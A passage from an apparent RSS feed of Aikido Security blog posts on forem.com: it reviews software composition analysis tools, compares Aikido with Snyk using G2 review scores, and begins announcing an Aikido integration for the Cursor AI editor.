&lt;strong&gt;Platform Limitations&lt;/strong&gt;: Primarily Linux-focused due to reliance on eBPF technology.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Semgrep
&lt;/h3&gt;

&lt;p&gt;Semgrep is a comprehensive supply chain security platform that scans across the development workflow, leveraging lightweight pattern matching and reachability analysis to detect vulnerabilities and anti-patterns directly exploitable in your code, while offering customizable rules and real-time dependency visibility.&lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_90b64e7936a71f83ed4f2948d85b4bb2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_90b64e7936a71f83ed4f2948d85b4bb2.png" alt="Semgrep (SCA)" width="800" height="436"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;End-to-End Scanning&lt;/strong&gt;: Monitors IDEs, repositories, CI/CD pipelines, and dependencies for security threats and anti-patterns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reachability Analysis&lt;/strong&gt;: Identifies if flagged vulnerabilities are actively exploitable in your application, reducing unnecessary noise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dependency Search&lt;/strong&gt;: Provides live, queryable streams of third-party packages and versions for real-time threat response and upgrade planning.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Semgrep Registry&lt;/strong&gt;: Features over 40,000 pre-built and community-contributed rules, with options for custom rule creation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Broad Language Support&lt;/strong&gt;: Supports 25+ modern programming languages, including Go, Java, Python, JavaScript, and C#.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seamless Integrations&lt;/strong&gt;: Works out-of-the-box with GitHub, GitLab, and other popular version control systems.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing for Larger Teams&lt;/strong&gt;: Costs escalate quickly for mid-sized and large teams ($110/contributor/month for 10+ contributors).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customization Complexity&lt;/strong&gt;: Writing and managing custom rules may require additional effort for less experienced teams.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Snyk
&lt;/h3&gt;

&lt;p&gt;Snyk has become the gold standard for traditional SCA tools, it creates detailed dependency trees, identifies nested dependencies, and creates prioritized remediation efforts based on real-world risk factors and  exploitability. Snyk fits into the developer workflows with dashboard, CLI / IDE tools, provides actionable fixes, and helps ensure open-source license compliance.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_45fb0d73ee681ac20a54801359dfcd9a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_45fb0d73ee681ac20a54801359dfcd9a.png" alt="Snyk " width="800" height="540"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dependency Tree Mapping&lt;/strong&gt;: Builds hierarchical graphs to detect vulnerabilities in direct and transitive dependencies and trace their impact.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proprietary Priority Scoring&lt;/strong&gt;: Ranks vulnerabilities based on exploitability, context, and potential impact, ensuring focus on critical threats.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk Advisor&lt;/strong&gt;: Assesses over 1 million open-source packages for security, quality, and maintenance to help developers choose the best dependencies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vulnerability Database&lt;/strong&gt;: Maintains a robust database of 10+ million open-source vulnerabilities, manually vetted for accuracy and actionable insights.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seamless Integration&lt;/strong&gt;: Works with popular version control systems, CI/CD pipelines, and IDEs to scan code and dependencies in real time.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customizable Policies&lt;/strong&gt;: Allows organizations to enforce specific rules for vulnerability handling and license compliance.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost for Advanced Features&lt;/strong&gt;: While the free plan is basic, advanced features for larger teams require higher-tier plans, which can be costly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual Verification Dependency&lt;/strong&gt;: Reliance on manual vetting for vulnerabilities may delay updates for newly discovered threats.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Socket Security&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Socket leverages deep package inspection and runtime behavior analysis to proactively detect supply chain threats, zero-day vulnerabilities, and anomalies in open-source dependencies, ensuring comprehensive protection beyond traditional SBOM-based scanning.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_c289f8ac39defb0a5a94c78901392327.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_c289f8ac39defb0a5a94c78901392327.png" alt="Socket Security " width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Key Features:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Deep Package Inspection&lt;/strong&gt;: Monitors dependencies' runtime behavior, including resource interactions and permission requests, to detect risky behaviors.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proactive Threat Detection&lt;/strong&gt;: Identifies zero-day vulnerabilities, typosquatting risks, and supply chain attacks before they’re publicly disclosed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pull Request Integration&lt;/strong&gt;: Automatically scans dependencies with every pull request and provides actionable GitHub comments, ensuring early risk mitigation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dependency Overview&lt;/strong&gt;: Offers insights into direct and transitive dependencies, providing a complete dependency graph with critical details and links.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Maintenance Risk Assessment&lt;/strong&gt;: Evaluates maintainer activity, codebase updates, and social validation to flag potential risks in OSS packages.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Disadvantages:&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Language Support&lt;/strong&gt;: Limited to JavaScript, Python, and Go dependencies, which may restrict usage for teams working in other languages.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Choosing The Right OSS Dependency Scanner
&lt;/h2&gt;

&lt;p&gt;Choosing the right SCA tool is going to depend on the specific needs of your project and the technology it uses. It is important to note that SCA is only one part of a comprehensive application security plan and using a stand-alone SCA tool will mean needing to integrate with multiple different vendors. All-in-one solutions like Aikido security are not just attractive in&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_fa95c1e7f1b549e4a896558509346b9f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fimage_fa95c1e7f1b549e4a896558509346b9f.png" alt="Aikido all in one security tool" width="800" height="340"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Want to see Aikido in action?&lt;a href="https://app.aikido.dev/login" rel="noopener noreferrer"&gt; Sign up&lt;/a&gt; to scan your repos and get your first SCA results in less than 2 minutes.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Snyk vs Aikido Security | G2 Reviews Snyk Alternative</title>
      <dc:creator>willem-delbare</dc:creator>
      <pubDate>Tue, 07 Jan 2025 07:30:40 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/snyk-vs-aikido-security-g2-reviews-snyk-alternative-3m4k</link>
      <guid>https://forem.com/aikidosecurity/snyk-vs-aikido-security-g2-reviews-snyk-alternative-3m4k</guid>
      <description>&lt;p&gt;So you’re in the market for application security, perhaps even a Snyk alternative. Whether it’s your first time exploring a code security platform or you’re a seasoned user searching for better options, you’re in the right place.&lt;/p&gt;

&lt;p&gt;When developers and businesses evaluate their choices, two names often rise to the top: &lt;strong&gt;Aikido Security&lt;/strong&gt; and &lt;strong&gt;Snyk&lt;/strong&gt;. Both platforms offer comprehensive tools for engineering teams to secure their applications, but how do they really compare? Rather than relying on opinions, let’s turn to the voices that matter most: real users.&lt;/p&gt;

&lt;h4&gt;
  
  
  Based on verified 3rd-party reviews
&lt;/h4&gt;

&lt;p&gt;This guide is a direct synopsis of verified third-party reviews from G2, the world’s largest trusted software marketplace. Over 100 million professionals rely on G2 annually to make informed software decisions using authentic user feedback. Based on the latest verified user data from G2, we’ll provide a detailed breakdown of Aikido Security vs. Snyk, analyzing features, user experience, pricing, and more.&lt;/p&gt;

&lt;p&gt;In addition, you can also read these user reviews directly on G2. Here is the G2 link for &lt;a href="https://www.g2.com/products/aikido-security/reviews" rel="noopener noreferrer"&gt;Aikido Security&lt;/a&gt; and for &lt;a href="https://www.g2.com/products/snyk/reviews" rel="noopener noreferrer"&gt;Snyk&lt;/a&gt;, and the &lt;a href="https://www.g2.com/compare/aikido-security-vs-snyk" rel="noopener noreferrer"&gt;direct comparison&lt;/a&gt; reviews that compare Aikido as a Snyk alternative. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is Aikido Security:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Led by serial CTO Willem Delbare, &lt;a href="https://www.aikido.dev/" rel="noopener noreferrer"&gt;Aikdio&lt;/a&gt; is the “no bullshit” security platform for developers. After many years using other application security products, Delbare founded Aikido to fix security for CTOs and developers with an all-in-one platform code-to-cloud security platform designed to help engineering teams &lt;em&gt;get security&lt;/em&gt; &lt;em&gt;&lt;u&gt;&lt;strong&gt;done&lt;/strong&gt;&lt;/u&gt;&lt;/em&gt;&lt;em&gt;.&lt;/em&gt;  Engineering teams execute faster with Aikido thanks to developer-dedicated features: centralized scans, aggressive false positive reduction, dev-native UX, automatic risk triage, risk bundling, and easy step-by-step risk fixes, including LLM-powered autofixes for 3 different issue types.&lt;/p&gt;

&lt;p&gt;TL;DR Aikido makes security simple for SMEs and doable for developers, so companies can win customers, grow up-market, and ace compliance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is Snyk:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Snyk is a well-known security company that positions itself as a “developer-oriented” security tool, for teams to identify and fix vulnerabilities in their code, open-source dependencies, and container images. Snyk is an early player in the “shift left” security movement and was founded 10 years ago in Tel Aviv and London and is currently headquartered in Boston, USA. &lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Aikido vs Snyk Alternative at a Glance&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Rating ⭐️:&lt;/strong&gt; 4.7&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Market Segments:&lt;/strong&gt; Small to Mid-Market Businesses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Entry-Level Pricing:&lt;/strong&gt; Free&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Snyk:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Rating ⭐️:&lt;/strong&gt; 4.5&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Market Segments:&lt;/strong&gt; Mid-Market to Enterprise&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Entry-Level Pricing:&lt;/strong&gt; Free&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;p&gt;Aikido Security is heavily favored by small to medium-sized businesses, while Snyk has broader adoption among larger mid-market organizations, especially enterprises. Both platforms offer free plans, making them accessible for individual developers and smaller teams.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Category Ranking Overview&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-12-23-at-085827_78c93af4e9e82f46da27de07490aa1c0.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-12-23-at-085827_78c93af4e9e82f46da27de07490aa1c0.jpg" width="800" height="435"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;User Experience&lt;/strong&gt;
&lt;/h2&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Ease of Use&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Rated 9.5, users praise its intuitive interface and streamlined workflows. It’s designed with a developer-first approach, ensuring minimal friction when integrating into existing CI/CD pipelines.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 8.7, while still user-friendly, some reviewers note a steeper learning curve, especially for teams unfamiliar with DevSecOps tools.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Ease of Setup&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: With a score of 9.5, users love Aikido’s quick onboarding process and minimal configuration requirements.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 9.0, setup is straightforward, but users occasionally encounter challenges integrating with less common tools.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Ease of Administration&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Scoring 9.3, system administrators find it simple to manage teams, permissions, and integrations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 8.8, administration is effective but can become complex in larger organizations.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Support and Product Direction&lt;/strong&gt;
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Quality of Support&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: With an impressive score of 9.6, users frequently commend the responsive and knowledgeable support team. Most testimonials highlight fast support from Aikido team and founders as a top highlight.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 8.6, support is OK, generally reliable but sometimes slower for free-tier users.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Product Direction&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Users rank Aikido with a round 10.0 score, reflecting user confidence in its innovative roadmap and consistent feature updates.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 8.7, appreciated for its focus on open source and developer-centric tools but slightly lagging in comprehensive feature rollouts.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Aikido vs Snyk Alternative Feature Comparison&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;If you are looking for a Snyk alternative, it is important to note the specific production functionalities that each platform offers. While Snyk offers SAST, IaC, Software Composition Analysis, and vulnerability scanning, Aikido offers more functions and features within its all-in-one platform.&lt;/p&gt;

&lt;p&gt;While Snyk offers 4 products, Aikido offers 11 products in one security suite, including SAST, DAST, Software Composition Analysis, IaC, container image scanning, secret scanning, malware scanning, API scanning, license risk scanning, local custom scanning, as well as cloud (CSPM) security.&lt;/p&gt;

&lt;p&gt;​&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-12-23-at-085911_7358dd83a6ec482cc21241aa5da69b9c.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2024-12-23-at-085911_7358dd83a6ec482cc21241aa5da69b9c.jpg" width="800" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Static Application Security Testing (SAST)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; SAST is a method to identify vulnerabilities in source code before deployment.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Rated 8.7, it excels in identifying vulnerabilities in source code and presenting actionable insights.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 7.7, effective but often criticized for generating more false positives compared to competitors.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Dynamic Application Security Testing (DAST)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; DAST is a technique that scans live applications to detect runtime vulnerabilities.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Scoring 8.9, users appreciate its ability to identify runtime vulnerabilities with minimal configuration.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Not enough data available to assess DAST capabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Container Security&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; Container Security is the process of identifying vulnerabilities in containerized applications and images.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Rated 8.4, it provides deep insights into container images and vulnerabilities across registries.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 7.9, strong for basic container scanning but less comprehensive in advanced scenarios.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Software Composition Analysis (SCA)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; SCA is the practice of detecting vulnerabilities in open-source dependencies and third-party libraries.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Scoring 8.9, it combines open-source dependency scanning with enhanced malware detection, ensuring robust protection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Rated 8.0, effective for detecting known vulnerabilities in open-source libraries but less advanced in identifying malicious packages.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Application Security Posture Management (ASPM)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; ASPM is a framework for managing and improving the security posture of applications across their lifecycle.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Scored 8.4, praised for its proactive approach to identifying and resolving security risks in application environments.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Not enough data available to assess ASPM capabilities.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Cloud Security Posture Management (CSPM)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; CSPM is a toolset for monitoring and securing cloud environments by identifying misconfigurations and compliance issues.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Monitors and secures cloud environments by identifying misconfigurations and compliance issues.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Rated 7.4, integrates seamlessly into multi-cloud environments, providing clear misconfiguration insights. Aikido CSPM functionality was recently launched and a big facet of our roadmap.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Not enough data is available to evaluate CSPM features. At this time, Snyk does not have CSPM functionality.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Vulnerability Scanner&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;What is it?&lt;/strong&gt; A Vulnerability Scanner identifies and evaluates security vulnerabilities in systems and software.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Aikido Security&lt;/strong&gt;: Rated 7.9, effective in pinpointing vulnerabilities with clear remediation guidance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Snyk&lt;/strong&gt;: Scored 8.1, valued for its extensive library of known vulnerabilities but criticized for frequent noise in results.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Verified Snyk vs Aikido customer testimonials:&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Reviews from verified people that have used both Aikido and Snyk. If you want to hear how Aikido stacks up as a Snyk Alternative, read on below.&lt;/p&gt;

&lt;p&gt;Aikido is an “effective and fair-priced solution”&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Compared to well known competitors like Snyk, Aikido is much more affordable, more complete and most importantly much better at presenting the vulnerabilities that are actually reaching your systems. They use many popular open source libraries to scan your code, as well as propriatary ones, giving you a good mix&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2025-01-02-at-112814_04f8c3b7c06a724702e77404e5138762.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2025-01-02-at-112814_04f8c3b7c06a724702e77404e5138762.jpg" width="800" height="382"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Aikido is  “a cheaper Snyk Alternative”&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;We were looking for a cheaper alternative to Snyk and Aikido fills that role fantastically. Good software, easy UI and most important of all very easy to talk to with feedback.&lt;/p&gt;

&lt;p&gt;Everything was really simple to set-up and onboarding of team members a breeze.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2025-01-02-at-112730_903d247933995ac44a151f5a9887cece.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Fscreenshot-2025-01-02-at-112730_903d247933995ac44a151f5a9887cece.jpg" width="800" height="394"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hopefully, this synopsis of G2 user feedback helps to inform your search for an application security platform. If you are interested in testing Aikido, why not &lt;a href="https://app.aikido.dev/login" rel="noopener noreferrer"&gt;launch now&lt;/a&gt;? &lt;/p&gt;

&lt;p&gt;Get your first scan results in 32 seconds with &lt;strong&gt;no credit card&lt;/strong&gt; and &lt;strong&gt;no strings&lt;/strong&gt; attached, you can even use demo data for extra security. If you want a more personalized walk-through, you can &lt;a href="https://www.aikido.dev/book-a-demo" rel="noopener noreferrer"&gt;talk to a human&lt;/a&gt; or say “hi” on intercom. We respond in seconds 🤝&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Launching Aikido for Cursor AI</title>
      <dc:creator>Felix Garriau</dc:creator>
      <pubDate>Mon, 02 Dec 2024 14:16:41 +0000</pubDate>
      <link>https://forem.com/aikidosecurity/launching-aikido-for-cursor-ai-5bfc</link>
      <guid>https://forem.com/aikidosecurity/launching-aikido-for-cursor-ai-5bfc</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Faikido-cursor-header_b83e6c2a7460735c122ff4c5838038d2.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2Faikido-cursor-header_b83e6c2a7460735c122ff4c5838038d2.jpg" alt="Gen AI Code Security with Aikido and Cursor AI " width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Cursor AI has quickly become the hot AI code editor, rapidly gaining popularity with developers looking to write code faster and more efficiently. &lt;em&gt;But while Cursor accelerates coding, how can devs trust that gen AI code is secure?&lt;/em&gt; &lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;TL;DR: with Aikido x Cursor, devs can secure their code as it’s&lt;/strong&gt; &lt;del&gt;&lt;strong&gt;written&lt;/strong&gt;&lt;/del&gt;  &lt;strong&gt;generated.&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;If you’ve missed the hype so far, Cursor is an “AI Native” IDE built on VSCode. It operates in an &lt;a href="https://techcrunch.com/2024/08/09/anysphere-a-github-copilot-rival-has-raised-60m-series-a-at-400m-valuation-from-a16z-thrive-sources-say/" rel="noopener noreferrer"&gt;increasingly crowded field&lt;/a&gt; of gen AI coding copilot startups, competing with Github Co-pilot, Cognition, Poolside, Magic, and Augment amongst others. Cursor was founded in 2022, but it wasn’t until mid-2024 that Cursor began its meteoric rise to the front of the Gen AI code race, around the same time that Cursor added Sonnet 3.5M as their default model... &lt;/p&gt;

&lt;p&gt;Below is a snapshot from last week’s ‘The Pragmatic Engineer” by Gregely Orosz, the #1 tech newsletter on substack, covering IDEs with GenAI features:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F24d6caab-35bf-4295-970a-a75df3e86f71-1526x1206_e967e05c48989c4eda13c0ebbddb2b00.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fd37oebn0w9ir6a.cloudfront.net%2Faccount_39169%2F24d6caab-35bf-4295-970a-a75df3e86f71-1526x1206_e967e05c48989c4eda13c0ebbddb2b00.png" alt="Cursor and other popular AI Native IDE for Gen AI Code Development" width="800" height="632"&gt;&lt;/a&gt;&lt;/p&gt;

